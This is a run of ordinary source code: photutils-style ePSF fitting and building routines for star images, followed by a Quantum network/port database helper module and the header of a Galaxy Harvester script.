fit_boxsize : int, tuple of int, or `None`, optional
The size (in pixels) of the box centered on the star to be used
for ePSF fitting. This allows using only a small number of
central pixels of the star (i.e., where the star is brightest)
for fitting. If ``fit_boxsize`` is a scalar then a square box
of size ``fit_boxsize`` will be used. If ``fit_boxsize`` has
two elements, they should be in ``(ny, nx)`` order. The size
must be greater than or equal to 3 pixels for both axes. If
`None`, the fitter will use the entire star image.
fitter_kwargs : dict-like, optional
Any additional keyword arguments (except ``x``, ``y``, ``z``, or
``weights``) to be passed directly to the ``__call__()`` method
of the input ``fitter``.
"""
def __init__(self, fitter=LevMarLSQFitter(), fit_boxsize=5,
**fitter_kwargs):
self.fitter = fitter
self.fitter_has_fit_info = hasattr(self.fitter, 'fit_info')
if fit_boxsize is not None:
fit_boxsize = np.atleast_1d(fit_boxsize).astype(int)
if len(fit_boxsize) == 1:
fit_boxsize = np.repeat(fit_boxsize, 2)
min_size = 3
if any([size < min_size for size in fit_boxsize]):
raise ValueError(f'size must be >= {min_size} for x and y')
self.fit_boxsize = fit_boxsize
# remove any fitter keyword arguments that we need to set
remove_kwargs = ['x', 'y', 'z', 'weights']
fitter_kwargs = copy.deepcopy(fitter_kwargs)
for kwarg in remove_kwargs:
if kwarg in fitter_kwargs:
del fitter_kwargs[kwarg]
self.fitter_kwargs = fitter_kwargs
def __call__(self, epsf, stars):
"""
Fit an ePSF model to stars.
Parameters
----------
epsf : `EPSFModel`
An ePSF model to be fitted to the stars.
stars : `EPSFStars` object
The stars to be fit. The center coordinates for each star
should be as close as possible to actual centers. For stars
that contain weights, a weighted fit of the ePSF to the star
will be performed.
Returns
-------
fitted_stars : `EPSFStars` object
The fitted stars. The ePSF-fitted center position and flux
are stored in the ``center`` (and ``cutout_center``) and
``flux`` attributes.
"""
if len(stars) == 0:
return stars
if not isinstance(epsf, EPSFModel):
raise TypeError('The input epsf must be an EPSFModel.')
# make a copy of the input ePSF
epsf = epsf.copy()
# perform the fit
fitted_stars = []
for star in stars:
if isinstance(star, EPSFStar):
fitted_star = self._fit_star(epsf, star, self.fitter,
self.fitter_kwargs,
self.fitter_has_fit_info,
self.fit_boxsize)
elif isinstance(star, LinkedEPSFStar):
fitted_star = []
for linked_star in star:
fitted_star.append(
self._fit_star(epsf, linked_star, self.fitter,
self.fitter_kwargs,
self.fitter_has_fit_info,
self.fit_boxsize))
fitted_star = LinkedEPSFStar(fitted_star)
fitted_star.constrain_centers()
else:
raise TypeError('stars must contain only EPSFStar and/or '
'LinkedEPSFStar objects.')
fitted_stars.append(fitted_star)
return EPSFStars(fitted_stars)
def _fit_star(self, epsf, star, fitter, fitter_kwargs,
fitter_has_fit_info, fit_boxsize):
"""
Fit an ePSF model to a single star.
The input ``epsf`` will usually be modified by the fitting
routine in this function. Make a copy before calling this
function if the original is needed.
"""
if fit_boxsize is not None:
try:
xcenter, ycenter = star.cutout_center
large_slc, _ = overlap_slices(star.shape, fit_boxsize,
(ycenter, xcenter),
mode='strict')
except (PartialOverlapError, NoOverlapError):
warnings.warn(f'The star at ({star.center[0]}, '
f'{star.center[1]}) cannot be fit because '
'its fitting region extends beyond the star '
'cutout image.', AstropyUserWarning)
star = copy.deepcopy(star)
star._fit_error_status = 1
return star
data = star.data[large_slc]
weights = star.weights[large_slc]
# define the origin of the fitting region
x0 = large_slc[1].start
y0 = large_slc[0].start
else:
# use the entire cutout image
data = star.data
weights = star.weights
# define the origin of the fitting region
x0 = 0
y0 = 0
# Define positions in the undersampled grid. The fitter will
# evaluate on the defined interpolation grid, currently in the
# range [0, len(undersampled grid)].
yy, xx = np.indices(data.shape, dtype=float)
xx = xx + x0 - star.cutout_center[0]
yy = yy + y0 - star.cutout_center[1]
# define the initial guesses for fitted flux and shifts
epsf.flux = star.flux
epsf.x_0 = 0.0
epsf.y_0 = 0.0
try:
fitted_epsf = fitter(model=epsf, x=xx, y=yy, z=data,
weights=weights, **fitter_kwargs)
except TypeError:
# fitter doesn't support weights
fitted_epsf = fitter(model=epsf, x=xx, y=yy, z=data,
**fitter_kwargs)
fit_error_status = 0
if fitter_has_fit_info:
fit_info = copy.copy(fitter.fit_info)
if 'ierr' in fit_info and fit_info['ierr'] not in [1, 2, 3, 4]:
fit_error_status = 2 # fit solution was not found
else:
fit_info = None
# compute the star's fitted position
x_center = star.cutout_center[0] + fitted_epsf.x_0.value
y_center = star.cutout_center[1] + fitted_epsf.y_0.value
star = copy.deepcopy(star)
star.cutout_center = (x_center, y_center)
# set the star's flux to the ePSF-fitted flux
star.flux = fitted_epsf.flux.value
star._fit_info = fit_info
star._fit_error_status = fit_error_status
return star
class EPSFBuilder:
"""
Class to build an effective PSF (ePSF).
See `Anderson and King (2000; PASP 112, 1360)
<https://ui.adsabs.harvard.edu/abs/2000PASP..112.1360A/abstract>`_
and `Anderson (2016), ISR WFC3 2016-12
<https://www.stsci.edu/files/live/sites/www/files/home/hst/instrumentation/wfc3/documentation/instrument-science-reports-isrs/_documents/2016/WFC3-2016-12.pdf>`_
for details.
Parameters
----------
oversampling : int or tuple of two int, optional
The oversampling factor(s) of the ePSF relative to the input
``stars`` along the x and y axes. The ``oversampling`` can
either be a single integer or a tuple of two integers of the form
``(x_oversamp, y_oversamp)``. If ``oversampling`` is a scalar
then the oversampling will be the same for both the x and y
axes.
shape : int, tuple of two int, or `None`, optional
The shape of the output ePSF. If the ``shape`` is `None`, it
will be derived from the sizes of the input ``stars`` and the
ePSF oversampling factor. If the size is even along any axis,
it will be made odd by adding one. The output ePSF will always
have odd sizes along both axes to ensure a well-defined central
pixel.
smoothing_kernel : {'quartic', 'quadratic'}, 2D `~numpy.ndarray`, or `None`
The smoothing kernel to apply to the ePSF. The predefined
``'quartic'`` and ``'quadratic'`` kernels are derived from
fourth and second degree polynomials, respectively.
Alternatively, a custom 2D array can be input. If `None` then
no smoothing will be performed.
recentering_func : callable, optional
A callable object (e.g., function or class) that is used to
calculate the centroid of a 2D array. The callable must accept
a 2D `~numpy.ndarray`, have a ``mask`` keyword and optionally
``error`` and ``oversampling`` keywords. The callable object
must return a tuple of two 1D `~numpy.ndarray` variables,
representing the x and y centroids.
recentering_maxiters : int, optional
The maximum number of recentering iterations to perform during
each ePSF build iteration.
fitter : `EPSFFitter` object, optional
An `EPSFFitter` object used to fit the ePSF to stars. To set
fitter options, pass in a new object created with the desired
options; by default the `EPSFFitter` defaults are used. See the
`EPSFFitter` documentation for the available options.
maxiters : int, optional
The maximum number of iterations to perform.
progress_bar : bool, optional
Whether to print the progress bar during the build iterations.
norm_radius : float, optional
The pixel radius over which the ePSF is normalized.
shift_val : float, optional
The undersampled value at which to compute the shifts. It must
be a strictly positive number.
recentering_boxsize : float or tuple of two floats, optional
The size (in pixels) of the box used to calculate the centroid
of the ePSF during each build iteration. If a single integer
number is provided, then a square box will be used. If two
values are provided, then they should be in ``(ny, nx)`` order.
center_accuracy : float, optional
The desired accuracy for the centers of stars. The building
iterations will stop if the centers of all the stars change by
less than ``center_accuracy`` pixels between iterations. All
stars must meet this condition for the loop to exit.
flux_residual_sigclip : `~astropy.stats.SigmaClip` object, optional
A `~astropy.stats.SigmaClip` object used to determine which pixels
are ignored based on the star sampling flux residuals, when
computing the average residual of ePSF grid points in each iteration
step.
"""
def __init__(self, oversampling=4., shape=None,
smoothing_kernel='quartic', recentering_func=centroid_com,
recentering_maxiters=20, fitter=EPSFFitter(), maxiters=10,
progress_bar=True, norm_radius=5.5, shift_val=0.5,
recentering_boxsize=(5, 5), center_accuracy=1.0e-3,
flux_residual_sigclip=SigmaClip(sigma=3, cenfunc='median',
maxiters=10)):
if oversampling is None:
raise ValueError("'oversampling' must be specified.")
oversampling = np.atleast_1d(oversampling).astype(int)
if len(oversampling) == 1:
oversampling = np.repeat(oversampling, 2)
if np.any(oversampling <= 0.0):
raise ValueError('oversampling must be a positive number.')
self._norm_radius = norm_radius
self._shift_val = shift_val
self.oversampling = oversampling
self.shape = self._init_img_params(shape)
if self.shape is not None:
self.shape = self.shape.astype(int)
self.recentering_func = recentering_func
self.recentering_maxiters = recentering_maxiters
self.recentering_boxsize = self._init_img_params(recentering_boxsize)
self.recentering_boxsize = self.recentering_boxsize.astype(int)
self.smoothing_kernel = smoothing_kernel
if not isinstance(fitter, EPSFFitter):
raise TypeError('fitter must be an EPSFFitter instance.')
self.fitter = fitter
if center_accuracy <= 0.0:
raise ValueError('center_accuracy must be a positive number.')
self.center_accuracy_sq = center_accuracy**2
maxiters = int(maxiters)
if maxiters <= 0:
raise ValueError("'maxiters' must be a positive number.")
self.maxiters = maxiters
self.progress_bar = progress_bar
if not isinstance(flux_residual_sigclip, SigmaClip):
raise ValueError("'flux_residual_sigclip' must be an"
" astropy.stats.SigmaClip function.")
self.flux_residual_sigclip = flux_residual_sigclip
# store each ePSF build iteration
self._epsf = []
def __call__(self, stars):
return self.build_epsf(stars)
@staticmethod
def _init_img_params(param):
"""
Initialize 2D image-type parameters that can accept either a
single or two values.
"""
if param is not None:
param = np.atleast_1d(param)
if len(param) == 1:
param = np.repeat(param, 2)
return param
def _create_initial_epsf(self, stars):
"""
Create an initial `EPSFModel` object.
The initial ePSF data are all zeros.
If ``shape`` is not specified, the shape of the ePSF data array
is determined from the shape of the input ``stars`` and the
oversampling factor. If the size is even along any axis, it
will be made odd by adding one. The output ePSF will always
have odd sizes along both axes to ensure a central pixel.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
Returns
-------
epsf : `EPSFModel`
The initial ePSF model.
"""
norm_radius = self._norm_radius
shift_val = self._shift_val
oversampling = self.oversampling
shape = self.shape
# define the ePSF shape
if shape is not None:
shape = np.atleast_1d(shape).astype(int)
if len(shape) == 1:
shape = np.repeat(shape, 2)
else:
# Stars class should have odd-sized dimensions, and thus we
# get the oversampled shape as oversampling * len + 1; if
# len=25, then newlen=101, for example.
x_shape = (np.ceil(stars._max_shape[0]) * oversampling[0] +
1).astype(int)
y_shape = (np.ceil(stars._max_shape[1]) * oversampling[1] +
1).astype(int)
shape = np.array((y_shape, x_shape))
# verify odd sizes of shape
shape = [(i + 1) if i % 2 == 0 else i for i in shape]
data = np.zeros(shape, dtype=float)
# ePSF origin should be in the undersampled pixel units, not the
# oversampled grid units. The middle, fractional (as we wish for
# the center of the pixel, so the center should be at (v.5, w.5)
# detector pixels) value is simply the average of the two values
# at the extremes.
xcenter = stars._max_shape[0] / 2.
ycenter = stars._max_shape[1] / 2.
epsf = EPSFModel(data=data, origin=(xcenter, ycenter),
oversampling=oversampling, norm_radius=norm_radius,
shift_val=shift_val)
return epsf
def _resample_residual(self, star, epsf):
"""
Compute a normalized residual image in the oversampled ePSF
grid.
A normalized residual image is calculated by subtracting the
normalized ePSF model from the normalized star at the location
of the star in the undersampled grid. The normalized residual
image is then resampled from the undersampled star grid to the
oversampled ePSF grid.
Parameters
----------
star : `EPSFStar` object
A single star object.
epsf : `EPSFModel` object
The ePSF model.
Returns
-------
image : 2D `~numpy.ndarray`
A 2D image containing the resampled residual image. The
image contains NaNs where there is no data.
"""
# Compute the normalized residual by subtracting the ePSF model
# from the normalized star at the location of the star in the
# undersampled grid.
x = star._xidx_centered
y = star._yidx_centered
stardata = (star._data_values_normalized -
epsf.evaluate(x=x, y=y, flux=1.0, x_0=0.0, y_0=0.0))
x = epsf.oversampling[0] * star._xidx_centered
y = epsf.oversampling[1] * star._yidx_centered
epsf_xcenter, epsf_ycenter = (int((epsf.data.shape[1] -
1) / 2),
int((epsf.data.shape[0] -
1) / 2))
xidx = _py2intround(x + epsf_xcenter)
yidx = _py2intround(y + epsf_ycenter)
resampled_img = np.full(epsf.shape, np.nan)
mask = np.logical_and(np.logical_and(xidx >= 0,
xidx < epsf.shape[1]),
np.logical_and(yidx >= 0,
yidx < epsf.shape[0]))
xidx_ = xidx[mask]
yidx_ = yidx[mask]
resampled_img[yidx_, xidx_] = stardata[mask]
return resampled_img
def _resample_residuals(self, stars, epsf):
"""
Compute normalized residual images for all the input stars.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
epsf : `EPSFModel` object
The ePSF model.
Returns
-------
epsf_resid : 3D `~numpy.ndarray`
A 3D cube containing the resampled residual images.
"""
shape = (stars.n_good_stars, epsf.shape[0], epsf.shape[1])
epsf_resid = np.zeros(shape)
for i, star in enumerate(stars.all_good_stars):
epsf_resid[i, :, :] = self._resample_residual(star, epsf)
return epsf_resid
def _smooth_epsf(self, epsf_data):
"""
Smooth the ePSF array by convolving it with a kernel.
Parameters
----------
epsf_data : 2D `~numpy.ndarray`
A 2D array containing the ePSF image.
Returns
-------
result : 2D `~numpy.ndarray`
The smoothed (convolved) ePSF data.
"""
from scipy.ndimage import convolve
if self.smoothing_kernel is None:
return epsf_data
# do this check first as comparing an ndarray to a string causes a warning
elif isinstance(self.smoothing_kernel, np.ndarray):
kernel = self.smoothing_kernel
elif self.smoothing_kernel == 'quartic':
# from Polynomial2D fit with degree=4 to 5x5 array of
# zeros with 1. at the center
# Polynomial2D(4, c0_0=0.04163265, c1_0=-0.76326531,
# c2_0=0.99081633, c3_0=-0.4, c4_0=0.05,
# c0_1=-0.76326531, c0_2=0.99081633, c0_3=-0.4,
# c0_4=0.05, c1_1=0.32653061, c1_2=-0.08163265,
# c1_3=0., c2_1=-0.08163265, c2_2=0.02040816,
# c3_1=-0.)
kernel = np.array(
[[+0.041632, -0.080816, 0.078368, -0.080816, +0.041632],
[-0.080816, -0.019592, 0.200816, -0.019592, -0.080816],
[+0.078368, +0.200816, 0.441632, +0.200816, +0.078368],
[-0.080816, -0.019592, 0.200816, -0.019592, -0.080816],
[+0.041632, -0.080816, 0.078368, -0.080816, +0.041632]])
elif self.smoothing_kernel == 'quadratic':
# from Polynomial2D fit with degree=2 to 5x5 array of
# zeros with 1. at the center
# Polynomial2D(2, c0_0=-0.07428571, c1_0=0.11428571,
# c2_0=-0.02857143, c0_1=0.11428571,
# c0_2=-0.02857143, c1_1=-0.)
kernel = np.array(
[[-0.07428311, 0.01142786, 0.03999952, 0.01142786,
-0.07428311],
[+0.01142786, 0.09714283, 0.12571449, 0.09714283,
+0.01142786],
[+0.03999952, 0.12571449, 0.15428215, 0.12571449,
+0.03999952],
[+0.01142786, 0.09714283, 0.12571449, 0.09714283,
+0.01142786],
[-0.07428311, 0.01142786, 0.03999952, 0.01142786,
-0.07428311]])
else:
raise TypeError('Unsupported kernel.')
return convolve(epsf_data, kernel)
def _recenter_epsf(self, epsf, centroid_func=centroid_com,
box_size=(5, 5), maxiters=20, center_accuracy=1.0e-4):
"""
Calculate the center of the ePSF data and shift the data so the
ePSF center is at the center of the ePSF data array.
Parameters
----------
epsf : `EPSFModel` object
The ePSF model.
centroid_func : callable, optional
A callable object (e.g., function or class) that is used
to calculate the centroid of a 2D array. The callable must
accept a 2D `~numpy.ndarray`, have a ``mask`` keyword
and optionally an ``error`` keyword. The callable object
must return a tuple of two 1D `~numpy.ndarray` variables,
representing the x and y centroids.
box_size : float or tuple of two floats, optional
The size (in pixels) of the box used to calculate the
centroid of the ePSF during each build iteration. If a
single integer number is provided, then a square box will be
used. If two values are provided, then they should be in
``(ny, nx)`` order.
maxiters : int, optional
The maximum number of recentering iterations to perform.
center_accuracy : float, optional
The desired accuracy for the centers of stars. The building
iterations will stop if the center of the ePSF changes by
less than ``center_accuracy`` pixels between iterations.
Returns
-------
result : 2D `~numpy.ndarray`
The recentered ePSF data.
"""
epsf_data = epsf._data
epsf = EPSFModel(data=epsf._data, origin=epsf.origin,
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val, normalize=False)
xcenter, ycenter = epsf.origin
y, x = np.indices(epsf._data.shape, dtype=float)
x /= epsf.oversampling[0]
y /= epsf.oversampling[1]
dx_total, dy_total = 0, 0
iter_num = 0
center_accuracy_sq = center_accuracy ** 2
center_dist_sq = center_accuracy_sq + 1.e6
center_dist_sq_prev = center_dist_sq + 1
while (iter_num < maxiters and
center_dist_sq >= center_accuracy_sq):
iter_num += 1
# Anderson & King (2000) recentering function depends
# on specific pixels, and thus does not need a cutout
if self.recentering_func == centroid_epsf:
epsf_cutout = epsf_data
else:
slices_large, _ = overlap_slices(epsf_data.shape, box_size,
(ycenter *
self.oversampling[1],
xcenter *
self.oversampling[0]))
epsf_cutout = epsf_data[slices_large]
mask = ~np.isfinite(epsf_cutout)
try:
# find a new center position
xcenter_new, ycenter_new = centroid_func(
epsf_cutout, mask=mask, oversampling=epsf.oversampling,
shift_val=epsf._shift_val)
except TypeError:
# centroid_func doesn't accept oversampling and/or shift_val
# keywords - try oversampling alone
try:
xcenter_new, ycenter_new = centroid_func(
epsf_cutout, mask=mask, oversampling=epsf.oversampling)
except TypeError:
# centroid_func doesn't accept oversampling and
# shift_val
xcenter_new, ycenter_new = centroid_func(epsf_cutout,
mask=mask)
if self.recentering_func != centroid_epsf:
xcenter_new += slices_large[1].start/self.oversampling[0]
ycenter_new += slices_large[0].start/self.oversampling[1]
# Calculate the shift; dx = i - x_star so if dx was positively
# incremented then x_star was negatively incremented for a given i.
# We will therefore actually subsequently subtract dx from xcenter
# (or x_star).
dx = xcenter_new - xcenter
dy = ycenter_new - ycenter
center_dist_sq = dx**2 + dy**2
if center_dist_sq >= center_dist_sq_prev: # don't shift
break
center_dist_sq_prev = center_dist_sq
dx_total += dx
dy_total += dy
epsf_data = epsf.evaluate(x=x, y=y, flux=1.0,
x_0=xcenter - dx_total,
y_0=ycenter - dy_total)
return epsf_data
def _build_epsf_step(self, stars, epsf=None):
"""
A single iteration of improving an ePSF.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
epsf : `EPSFModel` object, optional
The initial ePSF model. If not input, then the ePSF will be
built from scratch.
Returns
-------
epsf : `EPSFModel` object
The updated ePSF.
"""
if len(stars) < 1:
raise ValueError('stars must contain at least one EPSFStar or '
'LinkedEPSFStar object.')
if epsf is None:
# create an initial ePSF (array of zeros)
epsf = self._create_initial_epsf(stars)
else:
# improve the input ePSF
epsf = copy.deepcopy(epsf)
# compute a 3D stack of 2D residual images
residuals = self._resample_residuals(stars, epsf)
# compute the sigma-clipped average along the 3D stack
with warnings.catch_warnings():
warnings.simplefilter('ignore', category=RuntimeWarning)
warnings.simplefilter('ignore', category=AstropyUserWarning)
residuals = self.flux_residual_sigclip(residuals, axis=0,
masked=False,
return_bounds=False)
if HAS_BOTTLENECK:
residuals = bottleneck.nanmedian(residuals, axis=0)
else:
residuals = np.nanmedian(residuals, axis=0)
# interpolate any missing data (np.nan)
mask = ~np.isfinite(residuals)
if np.any(mask):
residuals = _interpolate_missing_data(residuals, mask,
method='cubic')
# fill any remaining nans (outer points) with zeros
residuals[~np.isfinite(residuals)] = 0.
# add the residuals to the previous ePSF image
new_epsf = epsf._data + residuals
# smooth and recenter the ePSF
new_epsf = self._smooth_epsf(new_epsf)
epsf = EPSFModel(data=new_epsf, origin=epsf.origin,
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val, normalize=False)
epsf._data = self._recenter_epsf(
epsf, centroid_func=self.recentering_func,
box_size=self.recentering_boxsize,
maxiters=self.recentering_maxiters)
# Return the new ePSF object, but with undersampled grid pixel
# coordinates.
xcenter = (epsf._data.shape[1] - 1) / 2. / epsf.oversampling[0]
ycenter = (epsf._data.shape[0] - 1) / 2. / epsf.oversampling[1]
return EPSFModel(data=epsf._data, origin=(xcenter, ycenter),
oversampling=epsf.oversampling,
norm_radius=epsf._norm_radius,
shift_val=epsf._shift_val)
def build_epsf(self, stars, init_epsf=None):
"""
Iteratively build an ePSF from star cutouts.
Parameters
----------
stars : `EPSFStars` object
The stars used to build the ePSF.
init_epsf : `EPSFModel` object, optional
The initial ePSF model. If not input, then the ePSF will be
built from scratch.
Returns
-------
epsf : `EPSFModel` object
The constructed ePSF.
fitted_stars : `EPSFStars` object
The input stars with updated centers and fluxes derived
from fitting the output ``epsf``.
"""
iter_num = 0
n_stars = stars.n_stars
fit_failed = np.zeros(n_stars, dtype=bool)
epsf = init_epsf
dt = 0.
center_dist_sq = self.center_accuracy_sq + 1.
centers = stars.cutout_center_flat
while (iter_num < self.maxiters and not np.all(fit_failed) and
np.max(center_dist_sq) >= self.center_accuracy_sq):
t_start = time.time()
iter_num += 1
if self.progress_bar:
if iter_num == 1:
dt_str = ' [? s/iter]'
else:
dt_str = f' [{dt:.1f} s/iter]'
print(f'PROGRESS: iteration {iter_num:d} (of max '
f'{self.maxiters}){dt_str}', end='\r')
# build/improve the ePSF
epsf = self._build_epsf_step(stars, epsf=epsf)
# fit the new ePSF to the stars to find improved centers
# we catch fit warnings here -- stars with unsuccessful fits
# are excluded from the ePSF build process
with warnings.catch_warnings():
message = '.*The fit may be unsuccessful;.*'
warnings.filterwarnings('ignore', message=message,
category=AstropyUserWarning)
stars = self.fitter(epsf, stars)
# find all stars where the fit failed
fit_failed = np.array([star._fit_error_status > 0
for star in stars.all_stars])
if np.all(fit_failed):
raise ValueError('The ePSF fitting failed for all stars.')
# permanently exclude fitting any star where the fit fails
# after 3 iterations
if iter_num > 3 and np.any(fit_failed):
idx = fit_failed.nonzero()[0]
for i in idx:
stars.all_stars[i]._excluded_from_fit = True
# if no star centers have moved by more than pixel accuracy,
# stop the iteration loop early
dx_dy = stars.cutout_center_flat - centers
dx_dy = dx_dy[np.logical_not(fit_failed)]
center_dist_sq = np.sum(dx_dy * dx_dy, axis=1, dtype=np.float64)
centers = stars.cutout_center_flat
self._epsf.append(epsf)
dt = time.time() - t_start
return epsf, stars
def _interpolate_missing_data(data, mask, method='cubic'):
"""
Interpolate missing data as identified by the ``mask`` keyword.
Parameters
----------
data : 2D `~numpy.ndarray`
An array containing the 2D image.
mask : 2D bool `~numpy.ndarray`
A 2D boolean mask array with the same shape as the input
``data``, where a `True` value indicates the corresponding
element of ``data`` is masked. The masked data points are
those that will be interpolated.
method : {'cubic', 'nearest'}, optional
The method used to interpolate the missing data:
* ``'cubic'``: Masked data are interpolated using 2D cubic
splines. This is the default.
* ``'nearest'``: Masked data are interpolated using
nearest-neighbor interpolation.
Returns
-------
data_interp : 2D `~numpy.ndarray`
The interpolated 2D image.
"""
from scipy import interpolate
data_interp = np.array(data, copy=True)
if len(data_interp.shape) != 2:
raise ValueError("'data' must be a 2D array.")
if mask.shape != data.shape:
raise ValueError("'mask' and 'data' must have the same shape.")
y, x = np.indices(data_interp.shape)
xy = np.dstack((x[~mask].ravel(), y[~mask].ravel()))[0]
z = data_interp[~mask].ravel()
if method == 'nearest':
interpol = interpolate.NearestNDInterpolator(xy, z)
elif method == 'cubic':
interpol = interpolate.CloughTocher2DInterpolator(xy, z)
else:
raise ValueError('Unsupported interpolation method.')
xy_missing = np.dstack((x[mask].ravel(), y[mask].ravel()))[0]
data_interp[mask] = interpol(xy_missing)
return data_interp
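# Hedged usage sketch, not part of this module: build an ePSF from star
# cutouts. ``extract_stars`` and ``NDData`` are assumed to be available from
# ``photutils.psf`` and ``astropy.nddata``; ``image`` and ``stars_tbl`` (a
# table of approximate x/y star positions) are placeholders supplied by the
# caller.
#
#     from astropy.nddata import NDData
#     from photutils.psf import extract_stars
#
#     nddata = NDData(data=image)
#     stars = extract_stars(nddata, stars_tbl, size=25)
#     builder = EPSFBuilder(oversampling=4, maxiters=5, progress_bar=False)
#     epsf, fitted_stars = builder(stars)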
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 Nicira Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# @author: Somik Behera, Nicira Networks, Inc.
# @author: Brad Hall, Nicira Networks, Inc.
# @author: Dan Wendlandt, Nicira Networks, Inc.
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker, exc, joinedload
from quantum.common import constants
from quantum.common import exceptions as q_exc
from quantum.plugins.cisco.db import models
_ENGINE = None
_MAKER = None
BASE = models.BASE
def configure_db(options):
"""Configure database.
Establish the database, create an engine if needed, and register the
models.
:param options: Mapping of configuration options
"""
global _ENGINE
if not _ENGINE:
_ENGINE = create_engine(options['sql_connection'],
echo=False,
echo_pool=True,
pool_recycle=3600)
register_models()
def clear_db():
global _ENGINE
assert _ENGINE
for table in reversed(BASE.metadata.sorted_tables):
_ENGINE.execute(table.delete())
def get_session(autocommit=True, expire_on_commit=False):
"""Helper method to grab session."""
global _MAKER, _ENGINE
if not _MAKER:
assert _ENGINE
_MAKER = sessionmaker(bind=_ENGINE,
autocommit=autocommit,
expire_on_commit=expire_on_commit)
return _MAKER()
def register_models():
"""Register Models and create properties."""
global _ENGINE
assert _ENGINE
BASE.metadata.create_all(_ENGINE)
def unregister_models():
"""Unregister Models, useful clearing out data before testing."""
global _ENGINE
assert _ENGINE
BASE.metadata.drop_all(_ENGINE)
def network_create(tenant_id, name):
session = get_session()
with session.begin():
net = models.Network(tenant_id, name)
session.add(net)
session.flush()
return net
def network_list(tenant_id):
session = get_session()
return (session.query(models.Network).
options(joinedload(models.Network.ports)).
filter_by(tenant_id=tenant_id).
all())
def network_id(net_name):
session = get_session()
networks = (session.query(models.Network).
options(joinedload(models.Network.ports)).
filter_by(name=net_name).
all())
if networks:
return networks
raise q_exc.NetworkNotFound(net_name=net_name)
def network_get(net_id):
session = get_session()
try:
return session.query(models.Network).\
options(joinedload(models.Network.ports)). \
filter_by(uuid=net_id).\
one()
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def network_update(net_id, tenant_id, **kwargs):
session = get_session()
net = network_get(net_id)
for key in kwargs.keys():
net[key] = kwargs[key]
session.merge(net)
session.flush()
return net
def network_destroy(net_id):
session = get_session()
try:
net = (session.query(models.Network).
filter_by(uuid=net_id).
one())
session.delete(net)
session.flush()
return net
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def validate_network_ownership(tenant_id, net_id):
session = get_session()
try:
return (session.query(models.Network).
filter_by(uuid=net_id).
filter_by(tenant_id=tenant_id).
one())
except exc.NoResultFound:
raise q_exc.NetworkNotFound(net_id=net_id)
def port_create(net_id, state=None):
# confirm network exists
network_get(net_id)
session = get_session()
with session.begin():
port = models.Port(net_id)
port['state'] = state or 'DOWN'
session.add(port)
session.flush()
return port
def port_list(net_id):
session = get_session()
return (session.query(models.Port).
options(joinedload(models.Port.network)).
filter_by(network_id=net_id).
all())
def port_get(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
try:
return (session.query(models.Port).
filter_by(uuid=port_id).
filter_by(network_id=net_id).
one())
except exc.NoResultFound:
raise q_exc.PortNotFound(net_id=net_id, port_id=port_id)
def port_update(port_id, net_id, **kwargs):
# confirm network exists
network_get(net_id)
port = port_get(net_id, port_id)
session = get_session()
for key in kwargs.keys():
if key == "state":
if kwargs[key] not in (constants.PORT_STATUS_ACTIVE,
constants.PORT_STATUS_DOWN):
raise q_exc.StateInvalid(port_state=kwargs[key])
port[key] = kwargs[key]
session.merge(port)
session.flush()
return port
def port_set_attachment(net_id, port_id, new_interface_id):
# confirm network exists
network_get(net_id)
session = get_session()
port = port_get(net_id, port_id)
if new_interface_id != "":
# We are setting, not clearing, the attachment-id
if port['interface_id']:
raise q_exc.PortInUse(net_id=net_id, port_id=port_id,
device_id=port['interface_id'])
try:
port = (session.query(models.Port).
filter_by(interface_id=new_interface_id).
one())
raise q_exc.AlreadyAttached(net_id=net_id,
port_id=port_id,
att_id=new_interface_id,
att_port_id=port['uuid'])
except exc.NoResultFound:
# this is what should happen
pass
port.interface_id = new_interface_id
session.merge(port)
session.flush()
return port
def port_unset_attachment(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
port = port_get(net_id, port_id)
port.interface_id = None
session.merge(port)
session.flush()
return port
def port_destroy(net_id, port_id):
# confirm network exists
network_get(net_id)
session = get_session()
try:
port = (session.query(models.Port).
filter_by(uuid=port_id).
filter_by(network_id=net_id).
one())
if port['interface_id']:
raise q_exc.PortInUse(net_id=net_id, port_id=port_id,
device_id=port['interface_id'])
session.delete(port)
session.flush()
return port
except exc.NoResultFound:
raise q_exc.PortNotFound(port_id=port_id)
#methods using just port_id
def port_get_by_id(port_id):
session = get_session()
try:
return (session.query(models.Port).
filter_by(uuid=port_id).one())
except exc.NoResultFound:
raise q_exc.PortNotFound(port_id=port_id)
def port_set_attachment_by_id(port_id, new_interface_id):
session = get_session()
port = port_get_by_id(port_id)
if new_interface_id != "":
if port['interface_id']:
raise q_exc.PortInUse(port_id=port_id,
device_id=port['interface_id'])
try:
port = session.query(models.Port).filter_by(
interface_id=new_interface_id).one()
raise q_exc.AlreadyAttached(port_id=port_id,
att_id=new_interface_id,
att_port_id=port['uuid'])
except exc.NoResultFound:
pass
port.interface_id = new_interface_id
session.merge(port)
session.flush()
return port
def port_unset_attachment_by_id(port_id):
session = get_session()
port = port_get_by_id(port_id)
port.interface_id = None
session.merge(port)
session.flush()
return port
def validate_port_ownership(tenant_id, net_id, port_id, session=None):
validate_network_ownership(tenant_id, net_id)
port_get(net_id, port_id)
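# Hedged usage sketch, not part of this module: configure the engine and
# create a network with a single port. The in-memory SQLite URL and the
# tenant/network names are illustrative only.
#
#     configure_db({'sql_connection': 'sqlite://'})
#     net = network_create('tenant-1', 'net-1')
#     port = port_create(net['uuid'], state='DOWN')
#     print(port_list(net['uuid']))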
|
#!/usr/bin/env python3
"""
Copyright 2020 Paul Willworth <[email protected]>
This file is part of Galaxy Harvester.
